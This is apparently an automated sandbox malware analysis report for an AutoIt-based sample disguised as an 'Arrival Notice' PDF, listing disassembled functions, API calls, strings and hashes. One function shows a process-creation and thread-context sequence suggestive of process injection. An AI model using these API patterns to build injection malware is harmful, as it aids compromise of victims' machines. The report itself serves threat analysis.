GetSysColorBrush.USER32(0000000F), ref: 00243E79
LoadCursorW.USER32(00000000,00007F00), ref: 00243E88
LoadIconW.USER32(00000063), ref: 00243E9E
LoadIconW.USER32(000000A4), ref: 00243EB0
LoadIconW.USER32(000000A2), ref: 00243EC2

Part of subcall function 00244024: LoadImageW.USER32(00240000,00000063,00000001,00000010,00000010,00000000), ref: 00244048

RegisterClassExW.USER32(?), ref: 00243F30

Part of subcall function 00243F53: GetSysColorBrush.USER32(0000000F), ref: 00243F86
Part of subcall function 00243F53: RegisterClassExW.USER32(00000030), ref: 00243FB0
Part of subcall function 00243F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00243FC1
Part of subcall function 00243F53: InitCommonControlsEx.COMCTL32(?), ref: 00243FDE
Part of subcall function 00243F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00243FEE
Part of subcall function 00243F53: LoadIconW.USER32(000000A9), ref: 00244004
Part of subcall function 00243F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00244013

Strings

#, xrefs: 00243F09
AutoIt v3, xrefs: 00243F1F
0, xrefs: 00243F02

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 860461c2b532aac6360b78550176190f029438b1101a48572308068068089b8f
Instruction ID: 3944b32ba1b268ed45360d9cb3e4099b220f4544efc576d8b874b835e001ffd3
Opcode Fuzzy Hash: 860461c2b532aac6360b78550176190f029438b1101a48572308068068089b8f
Instruction Fuzzy Hash: 7A2141B0D11304AFCB49DFA9EC59A9ABFF9FB48314F00812BE618A72A0D7754654CF91

Function 00D08670 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00D08741
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00D08967

Memory Dump Source

Source File: 00000000.00000002.1787683260.0000000000D06000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D06000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d06000_Arrival Notice_pdf.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
Instruction ID: 3acb5b3367fe1d24c256d7d046ab3a6ed40294bcf971602270727ed889400b7f
Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
Instruction Fuzzy Hash: 85A10574E00208EBDB14CFA4D894BAEBBB5FF48304F248159E149BB2C0DB759A40DFA5

Function 002449FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00244A1D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 002B41DB
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 002B421A
RegCloseKey.ADVAPI32(?), ref: 002B4249

Strings

Include, xrefs: 002B41D3, 002B4212
Software\AutoIt v3\AutoIt, xrefs: 00244A13

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: QueryValue$CloseOpen
String ID: Include$Software\AutoIt v3\AutoIt
API String ID: 1586453840-614718249
Opcode ID: 8888d656048dbb59d3b6115ff4bb0730388be89a1a5b5758844049ccd34351e2
Instruction ID: cbceb6d4a3b41fe0cfc578053fe5b76059c985a50f10594f1444010a378b3187
Opcode Fuzzy Hash: 8888d656048dbb59d3b6115ff4bb0730388be89a1a5b5758844049ccd34351e2
Instruction Fuzzy Hash: 5C114275620109BFDB04ABA8DD86EFF7BBCEF05344F104065B506D6191EA709E12DB50

Function 002436B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 002436E6
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00243707
ShowWindow.USER32(00000000,?,?,?,?,00243AA3,?), ref: 0024371B
ShowWindow.USER32(00000000,?,?,?,?,00243AA3,?), ref: 00243724

Strings

edit, xrefs: 00243701
AutoIt v3, xrefs: 002436DE, 002436E3, 002436E4

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 91e052919a5e825ac1976ffb953b5a44a06deb504e63d41a2df0363e64221761
Instruction ID: bfb1e67d541ee0018131732e9556a2c021452e72f3a11de313bd7c0ea88d5789
Opcode Fuzzy Hash: 91e052919a5e825ac1976ffb953b5a44a06deb504e63d41a2df0363e64221761
Instruction Fuzzy Hash: 9DF03A705412D07AE7325757AC5CF672EBDD7C6F20F01802FBA04A22A0C5611895CAB0

Function 00D08440 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 144
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00D08330: Sleep.KERNELBASE(000001F4), ref: 00D08341

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00D08564

Strings

H7FL1DWAI5, xrefs: 00D085C7, 00D085CA

Memory Dump Source

Source File: 00000000.00000002.1787683260.0000000000D06000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D06000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d06000_Arrival Notice_pdf.jbxd

Similarity

API ID: CreateFileSleep
String ID: H7FL1DWAI5
API String ID: 2694422964-2050071644
Opcode ID: 33315541ef525766105ba3a746c49031736310d73b59ad4a7d69b8360f4665ba
Instruction ID: 778b85a63234c07ebc365a5572244b4bc486817b37201d5ca519d30269f39da4
Opcode Fuzzy Hash: 33315541ef525766105ba3a746c49031736310d73b59ad4a7d69b8360f4665ba
Instruction Fuzzy Hash: 34519030D14248EBEF10DBE4C859BEEB779EF48300F104199A649BB2C0DA795B44DBB5

Function 00244A30 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 138
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00245374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00301148,?,002461FF,?,00000000,00000001,00000000), ref: 00245392

Part of subcall function 002449FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00244A1D

_wcscat.LIBCMT ref: 002B2D80
_wcscat.LIBCMT ref: 002B2DB5

Strings

\, xrefs: 002B2DA2
8!0, xrefs: 00244B1C
\Include\, xrefs: 00244B0A

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: _wcscat$FileModuleNameOpen
String ID: 8!0$\$\Include\
API String ID: 3592542968-1849498677
Opcode ID: 451095db8b99de89449228e6d7a5d7b99d3a9a80e2cde346fb72f029d0e7eb58
Instruction ID: 8aa8b181f76f9788f0f0dc9ce0ef3a00a7a444f437616643768b132c4f000f12
Opcode Fuzzy Hash: 451095db8b99de89449228e6d7a5d7b99d3a9a80e2cde346fb72f029d0e7eb58
Instruction Fuzzy Hash: 93518E714263408BC71DEF59D9A989BB3F8BE49300F40452FF64983260EB709958CF52

Function 002451AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0024522F
_wcscpy.LIBCMT ref: 00245283
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00245293
LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 002B3CB0

Strings

Line: , xrefs: 002B3CD9

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memset_wcscpy
String ID: Line:
API String ID: 1053898822-1585850449
Opcode ID: 2a8cba4324de7d143e6ec0479dad8fef829dee48970ed6b1603abc5f865764ec
Instruction ID: 445e8d0780e194a90d28723065ab18d681e99ef6864a580ddd09fc6d586d5325
Opcode Fuzzy Hash: 2a8cba4324de7d143e6ec0479dad8fef829dee48970ed6b1603abc5f865764ec
Instruction Fuzzy Hash: 5D31BE71028751ABD329EB60DC46FDE77DCAF44340F00451BF5C992092EBB0A668CF96

Function 00244139 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON

Download Yara Rule

APIs

Part of subcall function 002441A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,002439FE,?,00000001), ref: 002441DB

_free.LIBCMT ref: 002B36B7
_free.LIBCMT ref: 002B36FE

Part of subcall function 0024C833: __wsplitpath.LIBCMT ref: 0024C93E
Part of subcall function 0024C833: _wcscpy.LIBCMT ref: 0024C953
Part of subcall function 0024C833: _wcscat.LIBCMT ref: 0024C968
Part of subcall function 0024C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0024C978

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 002B3491
Bad directive syntax error, xrefs: 002B36E4

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 805182592-1757145024
Opcode ID: cbee3017b556b59ec1434f574798983342e9f2c42ceccd93cb643f1fe5b324c8
Instruction ID: b8ed88a5404f7f211489f10d10040064368d0da1820f9752ec9e7120b6882355
Opcode Fuzzy Hash: cbee3017b556b59ec1434f574798983342e9f2c42ceccd93cb643f1fe5b324c8
Instruction Fuzzy Hash: 65917F71930219AFCF18EFA4CC919EDB7B4BF18350F50442AF816AB291DB70AA64CF54

Function 002440E5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002B3725
GetOpenFileNameW.COMDLG32 ref: 002B376F

Part of subcall function 0024660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002453B1,?,?,002461FF,?,00000000,00000001,00000000), ref: 0024662F

Part of subcall function 002440A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 002440C6

Strings

X, xrefs: 002B373E
t3/, xrefs: 002B3745

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X$t3/
API String ID: 3777226403-3981693851
Opcode ID: 46a201235e408d9d6a541d51bebf8e22329bd4481fd5bc1fb76eaabe63c3698f
Instruction ID: 6e2630c00b56b994126e1d8568043468b553a0ea670d4edaa09de8ec8f526cb1
Opcode Fuzzy Hash: 46a201235e408d9d6a541d51bebf8e22329bd4481fd5bc1fb76eaabe63c3698f
Instruction Fuzzy Hash: 5521DB719201589BDF05EF94D8457EEB7F89F49304F004059E504B7241DBF456998F51

Function 002634AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

__getstream.LIBCMT ref: 002634FE

Part of subcall function 00267C0E: __getptd_noexit.LIBCMT ref: 00267C0E

@_EH4_CallFilterFunc@8.LIBCMT ref: 00263539
__wopenfile.LIBCMT ref: 00263549

Strings

<G, xrefs: 002634CD, 002634F0, 002634FC

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
String ID: <G
API String ID: 1820251861-2138716496
Opcode ID: edada277f416444f90ec82eaf9b67502d109eae02036fcd0bb61a495e5b46c8a
Instruction ID: 5519eea986c93ac4447bc64cc655edd8e57076573623643f13ed50a07dc47e59
Opcode Fuzzy Hash: edada277f416444f90ec82eaf9b67502d109eae02036fcd0bb61a495e5b46c8a
Instruction Fuzzy Hash: D911E370A20206DADB22FF709C4266EB6A4AF05350B158426E815DB281EF70CAF19FB1

Function 0025D298 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0025D28B,SwapMouseButtons,00000004,?), ref: 0025D2BC
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,0025D28B,SwapMouseButtons,00000004,?,?,?,?,0025C865), ref: 0025D2DD
RegCloseKey.KERNELBASE(00000000,?,?,0025D28B,SwapMouseButtons,00000004,?,?,?,?,0025C865), ref: 0025D2FF

Strings

Control Panel\Mouse, xrefs: 0025D2BA

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: df44afe8947b15af28ccb9087bab23722caca274cf8e429e31e78f1d7ec1dbfb
Instruction ID: 50782f539ec297a66acb8074708ab9ca5204946ec2c524a09ecc5db5ff4b2744
Opcode Fuzzy Hash: df44afe8947b15af28ccb9087bab23722caca274cf8e429e31e78f1d7ec1dbfb
Instruction Fuzzy Hash: D8117975A21209BFDB208FA8DC84EBF7BBCEF04741F004469E805D7110E771AE589B64

Function 00D07330 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 00D07AEB
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00D07B81
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00D07BA3

Memory Dump Source

Source File: 00000000.00000002.1787683260.0000000000D06000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D06000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d06000_Arrival Notice_pdf.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
Instruction ID: 258f7ff3c729d136d96af31e296315790b842e3e18e832e76ae25efb5626e078
Opcode Fuzzy Hash: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
Instruction Fuzzy Hash: E962D930E14658DBEB24CFA4C851BDEB376EF58300F1091A9E10DEB2D4E6759E81CB69

Function 00242322 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 159COMMON

Download Yara Rule

APIs

Part of subcall function 002422A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,002424F1), ref: 00242303

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 002425A1
CoInitialize.OLE32(00000000), ref: 00242618
CloseHandle.KERNEL32(00000000), ref: 002B503A

Strings

0, xrefs: 0024237A

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Handle$CloseInitializeMessageRegisterWindow
String ID: 0
API String ID: 3815369404-3684773922
Opcode ID: a65d1d28a5e4b216a38aaba6a3b2d792996ba88d915818faab527de88e64aa5a
Instruction ID: 999772be1146052ac7008f1f89bd6d8dc7ca00a1dab830dc4359ff022833e570
Opcode Fuzzy Hash: a65d1d28a5e4b216a38aaba6a3b2d792996ba88d915818faab527de88e64aa5a
Instruction Fuzzy Hash: CC71AFB8923245CBC31AEF5AADB0555BBECB759344B90496FE109CB7B1CB704414CF15

Function 0028C396 Relevance: 6.2, APIs: 4, Instructions: 154COMMON

Download Yara Rule

APIs

Part of subcall function 00244517: _fseek.LIBCMT ref: 0024452F

Part of subcall function 0028C56D: _wcscmp.LIBCMT ref: 0028C65D
Part of subcall function 0028C56D: _wcscmp.LIBCMT ref: 0028C670

_free.LIBCMT ref: 0028C4DD
_free.LIBCMT ref: 0028C4E4
_free.LIBCMT ref: 0028C54F

Part of subcall function 00261C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00267A85), ref: 00261CB1
Part of subcall function 00261C9D: GetLastError.KERNEL32(00000000,?,00267A85), ref: 00261CC3

_free.LIBCMT ref: 0028C557

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: b1dea307d073de71f2e22dcc08edb3c50191e9812145a8ddd3b93ebd22d983e9
Instruction ID: f082629c5037dbc0110bbe18dab9a106092cdc9d3ea579571ff1629cacbaf85b
Opcode Fuzzy Hash: b1dea307d073de71f2e22dcc08edb3c50191e9812145a8ddd3b93ebd22d983e9
Instruction Fuzzy Hash: 9E5162B5D14219AFDF15AF64DC81BAEB7B9EF48300F10049EF219A3281DB715AA0CF59

Function 0025EB83 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0025EBB2

Part of subcall function 002451AF: _memset.LIBCMT ref: 0024522F
Part of subcall function 002451AF: _wcscpy.LIBCMT ref: 00245283
Part of subcall function 002451AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00245293

KillTimer.USER32(?,00000001,?,?), ref: 0025EC07
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0025EC16
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 002B3C88

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: faf763226c8388f62529fd6d417d472bc976f3c42e042437423ba531a5f01298
Instruction ID: 31c27600528c468568d0269077ebd5356e91b3dbdc2e78c333314b69883b7611
Opcode Fuzzy Hash: faf763226c8388f62529fd6d417d472bc976f3c42e042437423ba531a5f01298
Instruction Fuzzy Hash: D22107705147849FEB37CB689859BEBBFEC9B01309F04009EE6CE56141C3B06B88CB51

Function 0028C71A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 0028C72F
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0028C746

Strings

aut, xrefs: 0028C740

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 0d0e1c4ec0e7fe4908d206b3bad21a20a7e6d31f4333e6b51ee37968c7153b11
Instruction ID: 6f95875fac1f9849fd8c8587d8a8050bf9c67e5d294991127a9851d5802bcdde
Opcode Fuzzy Hash: 0d0e1c4ec0e7fe4908d206b3bad21a20a7e6d31f4333e6b51ee37968c7153b11
Instruction Fuzzy Hash: AFD05E7150030EABDB10AB90EC0EF9AB76C9700704F0001B07B54A50B2DAB0E6998B55

Function 0029F8AE Relevance: 4.9, APIs: 3, Instructions: 385COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e92bc19b237ea61da57af1c18571a7c23b23649499188a5d4d61031f764c3c6
Instruction ID: e82ab04799ab5b6879b5aacb05db60d6b1cd57def0d0b92b160f9212ef69b609
Opcode Fuzzy Hash: 6e92bc19b237ea61da57af1c18571a7c23b23649499188a5d4d61031f764c3c6
Instruction Fuzzy Hash: BCF179716183019FCB50DF28C980B5AB7E5FF88714F14892EF9999B292DB70E915CF82

Function 00244FFC Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00245022
Shell_NotifyIconW.SHELL32(00000000,?), ref: 002450CB

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

